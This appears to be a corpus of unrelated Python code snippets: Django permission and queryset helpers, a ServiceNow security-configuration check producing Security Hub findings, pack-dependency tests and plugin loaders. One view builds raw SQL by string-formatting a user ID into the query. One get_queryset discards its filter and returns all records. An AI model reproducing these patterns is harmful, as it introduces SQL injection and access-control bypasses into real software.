modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def servicenow_sspm_privacy_client_callable_script_includes_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str):\n iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()\n\n # Name of the property to evaluate against\n evalTarget = \"glide.script.ccsi.ispublic\"\n # Get cached props\n sysPropCache = get_servicenow_sys_properties(cache)\n\n # There should not ever be a duplicate system property, use next() and a list comprehension to check if the\n # property we're evaluating is in the list of properties we get from the cache. If it is NOT then set the\n # value as `False` and we can fill in fake values. 
Not having a property for security hardening is the same\n # as a failed finding with a lot less fan fair\n propFinder = next((sysprop for sysprop in sysPropCache if sysprop[\"name\"] == evalTarget), False)\n # If we cannot find the property set \"NOT_CONFIGURED\" which will fail whatever the value should be\n if propFinder == False:\n propertyValue = \"NOT_CONFIGURED\"\n propDescription = \"\"\n propId = \"\"\n propCreatedOn = \"\"\n propCreatedBy = \"\"\n propUpdatedOn = \"\"\n propUpdatedBy = \"\"\n propScope = \"\"\n assetB64 = None\n else:\n propertyValue = str(propFinder[\"value\"])\n propDescription = str(propFinder[\"description\"]).replace(\"\\n \", \"\")\n propId = str(propFinder[\"sys_id\"])\n propCreatedOn = str(propFinder[\"sys_created_on\"])\n propCreatedBy = str(propFinder[\"sys_created_by\"])\n propUpdatedOn = str(propFinder[\"sys_updated_on\"])\n propUpdatedBy = str(propFinder[\"sys_updated_by\"])\n propScope = str(propFinder[\"sys_scope\"][\"value\"])\n # B64 encode all of the details for the Asset\n assetJson = json.dumps(propFinder,default=str).encode(\"utf-8\")\n assetB64 = base64.b64encode(assetJson) \n # NOTE: This is where the check evaluation happens - in SNOW these may be Bools or Numbers but will come back as Strings\n # always evaluate a failing condition first which should be the OPPOSITE of the SNOW reccomendation as sometimes the values\n # are not a simple Boolean expression\n if propertyValue != \"false\":\n finding = {\n \"SchemaVersion\": \"2018-10-08\",\n \"Id\": f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"ProductArn\": f\"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default\",\n \"GeneratorId\": f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"AwsAccountId\": awsAccountId,\n \"Types\": [\"Software and Configuration Checks\"],\n \"FirstObservedAt\": iso8601Time,\n \"CreatedAt\": iso8601Time,\n \"UpdatedAt\": iso8601Time,\n \"Severity\": {\"Label\": \"HIGH\"},\n \"Confidence\": 99,\n \"Title\": \"[SSPM.Servicenow.AccessControl.16] Instance should enable privacy control over all client-callable script includes accessed by public pages\",\n \"Description\": f\"Servicenow instance {SNOW_INSTANCE_NAME} does not enable privacy control over all client-callable script includes accessed by public pages. By default, client-callable script includes that do not explicitly set visibility, are public. If needed, add the 'glide.script.ccsi.ispublic' property to enable privacy control over all client-callable script includes accessed by public pages. When you add this property, you must set its value to false, which designates that all client-callable script includes are private, and changes their visibility in public pages. If you do not add this property, client-side script includes circumvent ACLs, which may result in unintended public functionality. If the client script provides confidential information, it could have an adverse potential security risk. 
Refer to the remediation instructions if this configuration is not intended.\",\n \"Remediation\": {\n \"Recommendation\": {\n \"Text\": \"For more information refer to the Privacy on client-callable script includes (instance security hardening) section of the Servicenow Product Documentation.\",\n \"Url\": \"https://docs.servicenow.com/bundle/utah-platform-security/page/administer/security/reference/privacy-on-client-callable-script-includes.html\",\n }\n },\n \"ProductFields\": {\n \"ProductName\": \"ElectricEye\",\n \"Provider\": \"ServiceNow\",\n \"ProviderType\": \"SaaS\",\n \"ProviderAccountId\": SNOW_INSTANCE_NAME,\n \"AssetRegion\": SNOW_INSTANCE_REGION,\n \"AssetDetails\": assetB64,\n \"AssetClass\": \"Management & Governance\",\n \"AssetService\": \"System Properties\",\n \"AssetComponent\": \"System Property\"\n },\n \"Resources\": [\n {\n \"Type\": \"ServicenowInstance\",\n \"Id\": f\"{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}\",\n \"Partition\": awsPartition,\n \"Region\": awsRegion,\n \"Details\": {\n \"Other\": {\n \"ServicenowInstance\": SNOW_INSTANCE_NAME,\n \"SysId\": propId,\n \"PropertyName\": evalTarget,\n \"PropertyValue\": propertyValue,\n \"Description\": propDescription,\n \"CreatedBy\": propCreatedBy,\n \"CreatedOn\": propCreatedOn,\n \"UpdatedBy\": propUpdatedBy,\n \"UpdatedOn\": propUpdatedOn,\n \"Scope\": propScope\n }\n }\n }\n ],\n \"Compliance\": {\n \"Status\": \"FAILED\",\n \"RelatedRequirements\": [\n \"NIST CSF V1.1 PR.PT-3\",\n \"NIST SP 800-53 Rev. 4 AC-3\",\n \"NIST SP 800-53 Rev. 4 CM-7\",\n \"AICPA TSC CC6.1\",\n \"ISO 27001:2013 A.6.2.2\", \n \"ISO 27001:2013 A.9.1.2\",\n \"ISO 27001:2013 A.9.4.1\",\n \"ISO 27001:2013 A.9.4.4\",\n \"ISO 27001:2013 A.9.4.5\",\n \"ISO 27001:2013 A.13.1.1\",\n \"ISO 27001:2013 A.14.1.2\",\n \"ISO 27001:2013 A.14.1.3\",\n \"ISO 27001:2013 A.18.1.3\"\n ]\n },\n \"Workflow\": {\"Status\": \"NEW\"},\n \"RecordState\": \"ACTIVE\"\n }\n yield finding\n else:\n finding = {\n \"SchemaVersion\": \"2018-10-08\",\n \"Id\": f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"ProductArn\": f\"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default\",\n \"GeneratorId\": f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"AwsAccountId\": awsAccountId,\n \"Types\": [\"Software and Configuration Checks\"],\n \"FirstObservedAt\": iso8601Time,\n \"CreatedAt\": iso8601Time,\n \"UpdatedAt\": iso8601Time,\n \"Severity\": {\"Label\": \"INFORMATIONAL\"},\n \"Confidence\": 99,\n \"Title\": \"[SSPM.Servicenow.AccessControl.16] Instance should enable privacy control over all client-callable script includes accessed by public pages\",\n \"Description\": f\"Servicenow instance {SNOW_INSTANCE_NAME} enables privacy control over all client-callable script includes accessed by public pages.\",\n \"Remediation\": {\n \"Recommendation\": {\n \"Text\": \"For more information refer to the Privacy on client-callable script includes (instance security hardening) section of the Servicenow Product Documentation.\",\n \"Url\": \"https://docs.servicenow.com/bundle/utah-platform-security/page/administer/security/reference/privacy-on-client-callable-script-includes.html\",\n }\n },\n \"ProductFields\": {\n \"ProductName\": \"ElectricEye\",\n \"Provider\": \"ServiceNow\",\n \"ProviderType\": \"SaaS\",\n \"ProviderAccountId\": SNOW_INSTANCE_NAME,\n \"AssetRegion\": SNOW_INSTANCE_REGION,\n \"AssetDetails\": assetB64,\n \"AssetClass\": \"Management & Governance\",\n 
\"AssetService\": \"System Properties\",\n \"AssetComponent\": \"System Property\"\n },\n \"Resources\": [\n {\n \"Type\": \"ServicenowInstance\",\n \"Id\": f\"{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}\",\n \"Partition\": awsPartition,\n \"Region\": awsRegion,\n \"Details\": {\n \"Other\": {\n \"ServicenowInstance\": SNOW_INSTANCE_NAME,\n \"SysId\": propId,\n \"PropertyName\": evalTarget,\n \"PropertyValue\": propertyValue,\n \"Description\": propDescription,\n \"CreatedBy\": propCreatedBy,\n \"CreatedOn\": propCreatedOn,\n \"UpdatedBy\": propUpdatedBy,\n \"UpdatedOn\": propUpdatedOn,\n \"Scope\": propScope\n }\n }\n }\n ],\n \"Compliance\": {\n \"Status\": \"PASSED\",\n \"RelatedRequirements\": [\n \"NIST CSF V1.1 PR.PT-3\",\n \"NIST SP 800-53 Rev. 4 AC-3\",\n \"NIST SP 800-53 Rev. 4 CM-7\",\n \"AICPA TSC CC6.1\",\n \"ISO 27001:2013 A.6.2.2\", \n \"ISO 27001:2013 A.9.1.2\",\n \"ISO 27001:2013 A.9.4.1\",\n \"ISO 27001:2013 A.9.4.4\",\n \"ISO 27001:2013 A.9.4.5\",\n \"ISO 27001:2013 A.13.1.1\",\n \"ISO 27001:2013 A.14.1.2\",\n \"ISO 27001:2013 A.14.1.3\",\n \"ISO 27001:2013 A.18.1.3\"\n ]\n },\n \"Workflow\": {\"Status\": \"RESOLVED\"},\n \"RecordState\": \"ARCHIVED\"\n }\n yield finding", "def test_collect_playbooks_dependencies_on_indicator_fields(self, module_repo):\n expected_packs = {\n (\"SafeBreach\", True),\n (\"CommonScripts\", True),\n (\"CommonTypes\", True),\n }\n expected_items = {\n (\"playbook\", \"SafeBreach - Compare and Validate Insight Indicators\"): {\n \"SafeBreach\": [(\"integration\", \"SafeBreach\")],\n \"CommonScripts\": [\n (\"script\", \"ChangeContext\"),\n (\"script\", \"Set\"),\n (\"script\", \"SetAndHandleEmpty\"),\n ],\n \"CommonTypes\": [(\"incidentfield\", \"indicator_accounttype\")],\n }\n }\n test_input = [\n {\n \"SafeBreach - Compare and Validate Insight Indicators\": {\n \"name\": \"SafeBreach - Compare and Validate Insight Indicators\",\n \"file_path\": \"Packs/SafeBreach/Playbooks/SafeBreach_Compare_and_Validate_Insight_Indicators.yml\",\n \"fromversion\": \"5.5.0\",\n \"implementing_scripts\": [\n \"ChangeContext\",\n \"Set\",\n \"SetAndHandleEmpty\",\n ],\n \"command_to_integration\": {\"safebreach-get-remediation-data\": \"\"},\n \"tests\": [\"No tests (auto formatted)\"],\n \"pack\": \"SafeBreach\",\n \"indicator_fields\": [\n \"accounttype\",\n ],\n }\n },\n ]\n\n found_packs, found_items = PackDependencies._collect_playbooks_dependencies(\n pack_playbooks=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n get_dependent_items=True,\n )\n\n assert found_packs == expected_packs\n assert found_items == expected_items", "def _check_protects(self, p4user, blobs):\n pc = ProtectsChecker(self.ctx, p4user, self.ctx.authenticated_p4user,\n self.ctx.foruser)\n pc.filter_paths(blobs)\n if pc.has_error():\n raise PreflightException(pc.error_message())", "def _filter_allows(self, ref, filtered_ref):\n for allow in self.allows_:\n if not allow:\n continue\n\n for sub_key, sub_ref in ref.ref_items(allow):\n filtered_ref.setdefault(sub_key).update(sub_ref.config)", "def getInterestedUsers():", "def KLP_Show_Permissions(request, boundary_id, user_id):\n\n userObj = User.objects.get(pk=user_id) # get user object\n boundType_List = Boundary_Type.objects.all() # get all boundary types\n\n # get session value, if session is not set default value is 0\n\n try:\n sessionVal = int(request.session['session_sch_typ'])\n except:\n sessionVal = 0\n redUrl = '/list/%s/user/%s/permissions/' % (boundary_id, user_id)\n\n # get all assigned institutions to the 
user\n\n assignedInst = Institution.objects.select_related('boundary'\n ).filter(Q(boundary__id=boundary_id)\n | Q(boundary__parent__id=boundary_id)\n | Q(boundary__parent__parent__id=boundary_id),\n active=2).extra(where=['''schools_institution.id in (SELECT \"obj_id\" FROM \"public\".\"object_permissions_institution_perms\" WHERE \"user_id\" = '%s' AND \"Acess\" = '1')'''\n % user_id]).only('id', 'name', 'boundary'\n ).order_by('boundary', 'boundary__parent'\n , 'name')\n\n assignedInstIds = assignedInst.values_list('id', flat=True)\n\n # get unassigned institutions based on assigned institutions\n\n unAssignedInst = Institution.objects.select_related('boundary'\n ).filter(Q(boundary__id=boundary_id)\n | Q(boundary__parent__id=boundary_id)\n | Q(boundary__parent__parent__id=boundary_id),\n active=2).exclude(pk__in=assignedInstIds).only('id'\n , 'name', 'boundary').order_by('boundary',\n 'boundary__parent', 'name')\n\n # get all assigned assessment objects\n\n assignedpermObjects = \\\n UserAssessmentPermissions.objects.select_related('assessment',\n 'instituion'\n ).filter(Q(instituion__boundary__id=boundary_id)\n | Q(instituion__boundary__parent__id=boundary_id)\n | Q(instituion__boundary__parent__parent__id=boundary_id),\n user=userObj, access=True).defer('access'\n ).order_by('instituion__boundary',\n 'instituion__boundary__parent',\n 'instituion__name')\n\n unMapObjs = \\\n Assessment_StudentGroup_Association.objects.select_related('student_group'\n , 'assessment'\n ).filter(Q(student_group__institution__boundary__id=boundary_id)\n | Q(student_group__institution__boundary__parent__id=boundary_id)\n | Q(student_group__institution__boundary__parent__parent__id=boundary_id),\n active=2).defer('active'\n ).order_by('student_group__institution__boundary',\n 'student_group__institution__boundary__parent',\n 'student_group__institution__name')\n for assignedPermObj in assignedpermObjects:\n qsets = Q(assessment=assignedPermObj.assessment) \\\n & Q(student_group__institution=assignedPermObj.instituion)\n unMapObjs = unMapObjs.exclude(qsets)\n unMapList = unMapObjs.values_list('student_group__institution',\n 'assessment').distinct()\n\n # get all unassigned assessment objects\n\n qList = \\\n [Assessment_StudentGroup_Association.objects.select_related('student_group'\n , 'assessment'\n ).filter(student_group__institution__id=unMapVal[0],\n assessment__id=unMapVal[1]).defer('active')[0] for unMapVal in\n unMapList]\n\n return render_to_response('viewtemplates/show_permissions.html', {\n 'assignedInst': assignedInst,\n 'userId': user_id,\n 'userName': userObj.username,\n 'unAssignedInst': unAssignedInst,\n 'assignedpermObjects': assignedpermObjects,\n 'redUrl': redUrl,\n 'qList': qList,\n }, context_instance=RequestContext(request))", "def include_related(request):\n query_param_value = request.GET.get(\"include_related\")\n return query_param_value in [\"true\", \"True\"]", "def _load_filter(self, *args, **kwargs):\n raise NotImplementedError", "def get_is_interested(self, obj):\n # pylint: disable=no-member\n user = self.context['request'].user\n if not user.is_authenticated:\n return None\n profile = UserProfile.objects.get(user=user)\n return profile in obj.interested_users.all()", "def _filter_related_fk(self, rel):\n field = rel.field\n if isinstance(field, models.ForeignKey):\n if self._join_allowed(rel.parent_model, rel.model, field):\n return rel", "def test_collect_incident_field_dependencies(self, module_repo):\n expected_result = {\n # incident types\n # (\"Expanse\", True), 
(\"IllusiveNetworks\", True),\n # scripts\n (\"Carbon_Black_Enterprise_Response\", True),\n (\"Phishing\", True),\n }\n\n test_input = [\n {\n \"Dummy Incident Field\": {\n \"name\": \"Dummy Incident Field\",\n \"fromversion\": \"5.0.0\",\n \"pack\": \"dummy_pack\",\n \"incident_types\": [\n \"Expanse Appearance\",\n \"Illusive Networks Incident\",\n ],\n \"scripts\": [\"CBLiveFetchFiles\", \"CheckEmailAuthenticity\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_incidents_fields_dependencies(\n pack_incidents_fields=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def import_various(context):\n # Only run step if a flag file is present\n if context.readDataFile('collective.opensearch-default.txt') is None:\n return\n logger = context.getLogger('collective.opensearch')\n site = context.getSite()\n pass", "def filter_for_user(self, user):\n query = Q(visibility=Document.PUBLIC) | \\\n Q(visibility=Document.PRIVATE, created_by=user) | \\\n Q(visibility=Document.ORG_ONLY,\n organization__memberships__user=user)\n\n if not user.external:\n query = query | Q(visibility=Document.ORG_ONLY_NO_EXTERNAL,\n organization__memberships__user=user)\n\n return super(DocumentManager, self).get_query_set().filter(query) \\\n .distinct()", "def public(self, user=None, project=None):\n queryset = self.filter(\n version__privacy_level=constants.PUBLIC,\n version__project__privacy_level=constants.PUBLIC,\n ).exclude(version__type=EXTERNAL)\n queryset |= self.filter(\n version__type=EXTERNAL,\n project__external_builds_privacy_level=constants.PUBLIC,\n project__privacy_level=constants.PUBLIC,\n )\n if user:\n if user.is_superuser:\n queryset = self.all()\n else:\n queryset = self._add_from_user_projects(\n queryset,\n user,\n admin=True,\n member=True,\n )\n if project:\n queryset = queryset.filter(project=project)\n return queryset.distinct()", "def get_objects(slice, plugin_type, klass, **kwargs):\n try:\n# plugins_modules = settings.PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n plugins_modules = PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n p_agg = plugins_modules.split('.')[-1]\n p_models_path = '.'.join(plugins_modules.split('.')[:-1])\n try:\n model = getattr(__import__(p_models_path,fromlist=[klass]), klass)\n except: \n try: \n model = getattr(__import__(p_models_path+'.'+klass,fromlist=[klass]), klass)\n except:\n pass \n # Filters resources by slice (will not return any aggregate's resource from another slice)\n objects = model.objects.filter(**kwargs)\n #print \"objects: %s\" % str(objects)\n for obj in objects:\n if not (obj != None and obj.aggregate in slice._get_aggregates()):\n raise Exception\n return objects\n except Exception,e:\n print \"[ERROR] PluginCommunicator could not obtain object. 
Details: %s \" % str(e)\n return None", "def test_collect_incident_field_dependencies_with_items(self, module_repo):\n expected_result = (\n {(\"Phishing\", True), (\"Carbon_Black_Enterprise_Response\", True)},\n {\n (\"incident_field\", \"Dummy Incident Field\"): {\n \"Carbon_Black_Enterprise_Response\": [\n (\"script\", \"CBLiveFetchFiles\")\n ],\n \"Phishing\": [(\"script\", \"CheckEmailAuthenticity\")],\n }\n },\n )\n\n test_input = [\n {\n \"Dummy Incident Field\": {\n \"name\": \"Dummy Incident Field\",\n \"fromversion\": \"5.0.0\",\n \"pack\": \"dummy_pack\",\n \"incident_types\": [\n \"Expanse Appearance\",\n \"Illusive Networks Incident\",\n ],\n \"scripts\": [\"CBLiveFetchFiles\", \"CheckEmailAuthenticity\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_incidents_fields_dependencies(\n pack_incidents_fields=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n get_dependent_items=True,\n )\n\n assert found_result == expected_result", "def dependency_filter(dependencies,start=0,end=-1,filter_val=None,filter_vals=[],field=None,filter_range='dependent'):\n return [getattr(i, field) if field else i for i in dependencies if \n (start == 0 or getattr(i, filter_range).idx >= start) and \n (end == -1 or getattr(i, filter_range).idx < end) and \n ((filter_val == None and not filter_vals) or i.type in filter_vals + [filter_val] or (filter_val[-1]=='*' and i.type.startswith(filter_val[0:-1])))\n ]", "def allow_relation(self, obj1, obj2, **hints):\n\n result = (obj1._meta.model_name in DefaultRouting.defaultModels and \n obj2._meta.model_name in DefaultRouting.defaultModels)\n return result", "def test_get_risk_profile_all_using_get(self):\n pass", "def generate_exclusions(proteins):\n pass", "def _check_ws_objects(self, source_objects):\n\n if source_objects:\n objects = [{\"ref\": ref} for ref in source_objects]\n info = self.get_workspace().get_object_info3(\n {\"objects\": objects, \"ignoreErrors\": 1}\n )\n paths = info.get(\"paths\")\n\n if None in paths:\n raise ValueError(\"Some workspace object is inaccessible\")", "def get_queryset(self, request):\n qs = super().get_queryset(request)\n if request.user.is_superuser:\n return qs\n\n return qs.filter(bank=request.user.profile.bank)", "def get_queryset(self, request):\n qs = super().get_queryset(request)\n if request.user.is_superuser:\n return qs\n\n return qs.filter(bank=request.user.profile.bank)", "def test_collect_playbooks_dependencies_on_filter(self, module_repo):\n expected_result = {(\"CommonScripts\", True)}\n\n test_input = [\n {\n \"Dummy Playbook\": {\n \"name\": \"Dummy Playbook\",\n \"file_path\": \"dummy_path\",\n \"fromversion\": \"dummy_version\",\n \"filters\": [\"IsInCidrRanges\"],\n }\n },\n ]\n\n found_result = PackDependencies._collect_playbooks_dependencies(\n pack_playbooks=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def test_collect_playbooks_dependencies_on_incident_fields(self, module_repo):\n expected_result = {(\"DigitalGuardian\", False), (\"EmployeeOffboarding\", False)}\n test_input = [\n {\n \"Dummy Playbook\": {\n \"name\": \"Dummy Playbook\",\n \"file_path\": \"dummy_path\",\n \"fromversion\": \"dummy_version\",\n \"implementing_scripts\": [],\n \"implementing_playbooks\": [],\n \"command_to_integration\": {},\n \"tests\": [\"dummy_playbook\"],\n \"pack\": \"dummy_pack\",\n \"incident_fields\": [\n \"digitalguardianusername\",\n \"Google Display Name\",\n ],\n }\n }\n ]\n\n found_result = 
PackDependencies._collect_playbooks_dependencies(\n pack_playbooks=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def test_whitelist(self):\n p = self.load_policy({\n 'name': 'test-key-vault',\n 'resource': 'azure.keyvault',\n 'filters': [\n {'type': 'value',\n 'key': 'name',\n 'op': 'glob',\n 'value_type': 'normalize',\n 'value': 'cckeyvault1*'},\n {'not': [\n {'type': 'whitelist',\n 'key': 'principalName',\n 'users': ['[email protected]']}\n ]}\n ]\n })\n resources = p.run()\n self.assertEqual(len(resources), 1)", "def _filter_in_request(self):\n pass", "def get_queryset(self):\n qs = super().get_queryset()\n qs.filter(company=self.request.user.company)\n return qs", "def test_profile_filtering(instr_task_workbench, instr_view):\n add_profile(instr_task_workbench, 'fp5', 'Dummy.dumb.002')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp5' not in filtered\n\n add_profile(instr_task_workbench, 'fp6', 'Dummy.dumb.003')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp6' in filtered", "def test_filter_by_atribute(admin_client, public_resource_with_metadata, private_resource_with_metadata):\n query_filter = {\"availability\": [\"public\"]}\n djangoresponse = admin_client.get('/discoverapi/?filter={}'.format(json.dumps(query_filter)), follow=True)\n response = json.loads(djangoresponse.content.decode(\"utf-8\"))\n short_ids = [x['short_id'] for x in json.loads(response['resources'])]\n assert djangoresponse.status_code == 200\n assert public_resource_with_metadata.short_id in short_ids\n assert private_resource_with_metadata.short_id not in short_ids", "def isAuthorized(user, ress_name, action_name):\r\n #Import model that support PGSQL schema if difined\r\n if hasattr(settings, 'ACL_UTILS'):\r\n try:\r\n utils = __import__(settings.ACL_UTILS, fromlist=['*'])\r\n return utils.isAuthorized(user, ress_name, action_name)\r\n except ImportError:\r\n raise Exception(\"ACL UTILS import Error\")\r\n else:\r\n utils = __import__(\"geoprisma.acl.utils\", fromlist=['*'])\r\n return utils.isAuthorized(user, ress_name, action_name)", "def _get_includes(self):\n models = []\n op, targets = self.get_data()\n if op == self.OPERATOR.NOT:\n return models\n\n for t in targets:\n if isinstance(t, ObjectModel):\n models += [t]\n elif isinstance(t, TargetingCriterion):\n if op != self.OPERATOR.NOT:\n models += t._get_includes()\n\n return models", "def check_faceted_search_users(integrated_ff):\n key, ff_env = integrated_ff['ff_key'], integrated_ff['ff_env']\n all_facets = ff_utils.get_item_facets('user', key=key, ff_env=ff_env)\n any_affiliation = {'item_type': 'user',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets}\n resp = ff_utils.faceted_search(**any_affiliation)\n total = len(resp)\n print(\"total=\", total) # Probably a number somewhere near 30\n assert 10 < total < 50\n affiliation = {'item_type': 'user',\n 'Affiliation': '4DN Testing Lab',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets}\n resp = ff_utils.faceted_search(**affiliation)\n affiliated = len(resp)\n print(\"affiliated=\", affiliated) # Probably a number near 5\n assert affiliated < 10\n neg_affiliation = {'item_type': 'user',\n 'Affiliation': '-4DN Testing Lab',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets}\n resp = ff_utils.faceted_search(**neg_affiliation)\n unaffiliated = 
len(resp) # Probably a number near 25, but in any case the length of the complement set\n assert unaffiliated == total - affiliated\n neg_affiliation = {'item_type': 'user',\n 'Affiliation': '-4DN Testing Lab',\n 'key': key,\n 'ff_env': ff_env,\n 'item_facets': all_facets,\n 'Limit': '10'} # test limit\n resp = ff_utils.faceted_search(**neg_affiliation)\n assert len(resp) == 10", "def test_user_get_objects_any_perms_related(self):\n group0 = self.test_save('TestGroup0', user0)\n \n object2 = TestModel.objects.create(name='test2')\n object2.save()\n \n child0 = TestModelChild.objects.create(parent=object0)\n child1 = TestModelChild.objects.create(parent=object1)\n child2 = TestModelChild.objects.create(parent=object2)\n child3 = TestModelChild.objects.create(parent=object2)\n child0.save()\n child1.save()\n child2.save()\n \n childchild = TestModelChildChild.objects.create(parent=child0)\n childchild.save()\n \n group0.grant('Perm1', object0) # perms on both\n group0.grant('Perm2', child0) # perms on both\n group0.grant('Perm3', object1) # perm on parent only (child 1)\n group0.grant('Perm4', child2) # perm on child only\n group0.grant('Perm1', childchild)\n \n user0.grant('Perm1', object0) # perms on both\n user0.grant('Perm2', child0) # perms on both\n \n # related field with implicit perms\n query = user0.get_objects_any_perms(TestModelChild, parent=None)\n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assert_(child1 in query, 'user should have perms on parent')\n self.assert_(child2 in query, 'user should have perms on parent, and directly')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n self.assertEqual(3, len(query))\n \n # related field with single perms\n query = user0.get_objects_any_perms(TestModelChild, parent=['Perm3'])\n \n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assert_(child1 in query, 'user should have perms on parent')\n self.assert_(child2 in query, 'user should have perms on parent')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n self.assertEqual(3, len(query), query.values('id'))\n \n # related field with multiple perms\n query = user0.get_objects_any_perms(TestModelChild, parent=['Perm1','Perm3'])\n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assert_(child1 in query, 'user should have perms on parent')\n self.assert_(child2 in query, 'user should have perms on parent')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n self.assertEqual(3, len(query))\n \n # mix of direct and related perms\n query = user0.get_objects_any_perms(TestModelChild, perms=['Perm4'], parent=['Perm1'])\n self.assertEqual(2, len(query))\n self.assert_(child0 in query, 'user should have perms on parent and directly')\n self.assertFalse(child1 in query, 'user should not have perms on parent')\n self.assert_(child2 in query, 'user should have perms directly')\n self.assertFalse(child3 in query, 'user should have no perms on this object or its parent')\n \n # multiple relations\n query = user0.get_objects_any_perms(TestModelChildChild, parent=['Perm2'], parent__parent=['Perm1'])\n self.assert_(childchild in query)\n self.assertEqual(1, len(query))\n \n # exclude groups\n query = user0.get_objects_any_perms(TestModelChild, groups=False, parent=['Perm1'])\n self.assert_(child0 in query)\n self.assertEqual(1, len(query))", "def 
__conclusion(self, *args, **kwargs):\n pass", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def checkMetamodelLevel(cls):\n for mmd in cls.metamodelDependencies():\n mmd.check()", "def get_model_queryset(self, request):\n if request.user.is_superuser:\n result = Field.objects.all()\n elif hasattr(request.user, 'farmuser'):\n result = Field.objects.filter(farm_user=request.user.farmuser)\n elif hasattr(request.user, 'farmchilduser'):\n result = Field.objects.filter(farm_user=request.user.farmchilduser.master)\n else:\n return None\n return filter_by_date_updated(request=request, queryset=result)", "def on_includes(self, includes):\n pass", "def checkImport(self):\r\n for imp in self.cap_file.Import.packages:\r\n if a2s(imp.aid) not in export_refs:\r\n return False\r\n return True", "def autofixDependencies(self, global_ctx):\n pass", "def _referencedChecker(self, entity, params):\n\n if 'ref_logic' not in params:\n return False\n\n logic = self.helper.getLogicForItem(params, 'ref_logic')\n filter = {\n params['ref_field']: entity.key()\n }\n ref_entity = logic.getForFields(filter=filter, unique=True)\n\n result = ref_entity is not None\n\n no_ref = params.get('no_ref')\n if no_ref:\n result = not result\n\n return result", "def __has_no_dependents (self, obj, constraints):\n failed = False\n while constraints and not failed:\n c = constraints [0]\n\n if c [1] == obj:\n failed = True\n\n constraints = constraints [1:]\n\n return not failed", "def testPrefetchProvenance(self):\n try:\n provU = ProvenanceProvider(self.__cfgOb, self.__cachePath)\n pD = provU.fetch()\n logger.debug(\"pD keys %r\", list(pD.keys()))\n self.assertGreaterEqual(len(pD.keys()), 1)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def allow_relation(self, obj1, obj2, **hints):\n\t\tif obj1._meta.app_label == 'product' or \\\n\t\t obj2._meta.app_label == 'product':\n\t\t return True\n\t\treturn None", "def _constraints_external(self):\n pass", "def checkRequiredDependencies(self):\n \n # skip dependency check for downloading only\n if( self.downloadOnly ):\n return\n\n # hard dependencies\n for req in self.reqmodules:\n if( self.parent.module(req) == None ):\n # check if there is an auto detected module\n if( self.parent.module(req, True) == None ):\n self.abort( self.name + \" requires \" + req \\\n + \" and it wasn't found in your config file!!\" )\n else:\n # use auto detected module\n self.parent.use( self.parent.module(req, True) )\n self.parent.module( req ).init()\n\n print self.name + \": auto-detected \" + req + \" version \" + self.parent.module( req ).version\n \n # build only dependencies\n if( self.mode == \"install\" ):\n mods = self.reqmodules_buildonly + self.reqmodules_external\n for req in mods:\n if( self.parent.module(req) == None ):\n # check if there is an auto detected module\n if( self.parent.module(req, True) == None ):\n self.abort( req + \" not found in your config file!! 
\" + self.name \\\n + \" cannot be built without \" + req )\n else:\n # use auto detected module\n self.parent.use( self.parent.module(req, True) )\n self.parent.module( req ).init()\n\n print \" - \" + self.name + \": auto-detected \" + req + \" version \" + self.parent.module( req ).version", "def check_requirements(self):\n # first, separate plugins based on those with and without dependeices.\n remaining = set()\n loaded = set()\n\n for k, v in self.modules.items():\n if v.requirements:\n remaining.add(v)\n else:\n loaded.add(k)\n self.module_call_order.append(v)\n\n for r in remaining:\n # first we check to make sure that all dependencies are satisfied.\n if not self.dependencies_satisfied(r):\n raise Exception(f\"Oops! Module {r} is not satisfied! It desires: {r.requirements}\")\n\n # now confident that all versions check out, arrange the plugins into a suitable load order.\n # no reason to do anything fancy without requirements though.\n if not remaining:\n return\n\n while True:\n new_remaining = 